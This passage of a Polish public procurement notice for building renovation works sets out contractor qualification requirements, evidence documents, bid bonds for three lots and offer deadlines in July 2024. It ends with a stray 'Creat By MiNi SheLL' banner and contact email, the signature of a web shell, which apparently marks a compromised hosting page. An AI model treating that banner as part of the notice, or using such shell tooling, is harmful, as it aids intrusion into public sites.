co najmniej jedną osobą pełniącą funkcję Kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej w zakresie umożliwiającym kierowanie robotami budowlanymi obejmującymi przedmiot zamówienia lub inne ważne odpowiadające im uprawnienia budowlane wystawione na podstawie wcześniej obowiązujących przepisów, albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane, oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/>3) warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: co najmniej jedną osobą pełniącą funkcję Kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności <br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie umożliwiającym kierowanie robotami budowlanymi obejmującymi przedmiot zamówienia lub inne ważne odpowiadające im uprawnienia budowlane wystawione na podstawie wcześniej obowiązujących przepisów, albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane, oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/><br/>Zadanie nr 3: <br/><br/>1) w zakresie doświadczenia zamawiający wymaga aby Wykonawca wykazał, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał lub wykonuje (przy czym w tym przypadku będzie uwzględniana wartość zrealizowanej części przedmiotu umowy) należycie w ramach jednej umowy co najmniej 1 zadanie polegające na przebudowie, rozbudowie lub remoncie budynku użyteczności publicznej o wartości minimum 290.000,00 zł brutto obejmujące jednocześnie: wymianę ślusarki drzwiowej lub stolarki okiennej, wykonanie systemu oddymiania i awaryjnego oświetlenia ewakuacyjnego.<br/>Przy czym zadanie ma być wykonane na podstawie jednej umowy, zamawiający nie dopuszcza sumowania mniejszych umów w celu wykazania spełniania warunku udziału. Jak również jedna umowa ma obejmować wykonanie jednocześnie wszystkich prac określonych w warunku. <br/><br/>2) warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: co najmniej jedną osobą pełniącą funkcję Kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej w zakresie umożliwiającym kierowanie robotami budowlanymi obejmującymi przedmiot zamówienia lub inne ważne odpowiadające im uprawnienia budowlane wystawione na podstawie wcześniej obowiązujących przepisów, albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane, oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/>3) warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: co najmniej jedną osobą pełniącą funkcję Kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności <br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie umożliwiającym kierowanie robotami budowlanymi obejmującymi przedmiot zamówienia lub inne ważne odpowiadające im uprawnienia budowlane wystawione na podstawie wcześniej obowiązujących przepisów, albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane, oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji.;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.; Wykaz robót budowlanych wykonanych w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji<br/>robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wykaz robót budowlanych dotyczy robót budowlanych, w<br/>których wykonaniu Wykonawca ten bezpośrednio uczestniczył.;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium:<br/>Dla części zamówienia nr 1: 4 200.00 PLN (słownie: cztery tysiące dwieście <br/>00/100 PLN)<br/>Dla części zamówienia nr 2: 3 500.00 PLN (słownie: trzy tysiące pięćset 00/100<br/>PLN)<br/>Dla części zamówienia nr 3: 2 400.00 PLN (słownie: dwa tysiące czterysta <br/>00/100 PLN) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Pełnomocnictwo należy dołączyć do oferty i powinno<br/>ono zawierać w szczególności wskazanie postępowania udzielenie zamówienia publicznego, którego dotyczy, wszystkich<br/>Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz ustanowionego pełnomocnika oraz zakresu jego<br/>umocowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu<br/>wykluczeniu oraz spełnianiu warunków udziału”, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. W związku z powyższym, zgodnie z art. 117 ust. 4 PZP Wykonawca jest zobowiązany załączyć do oferty<br/>podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy. Wzór stosownego oświadczenia został zawarty w Formularzu Oferty, stanowiącym załącznik do SWZ i<br/>Zamawiający zaleca złożyć to oświadczenie właśnie w tym Formularzu. Obowiązek złożenia oświadczenia, o którym mowa<br/>w art. 117 ust. 4 PZP odnosi się również do Wykonawców prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian<br/>postanowień zawartej umowy w sprawie zamówienia publicznego na zasadach, zakresie i w przypadkach określonych w §<br/>13 wzoru umowy, który stanowi integralny załącznik do niniejszego SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-23 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną za pośrednictwem: https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-23 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com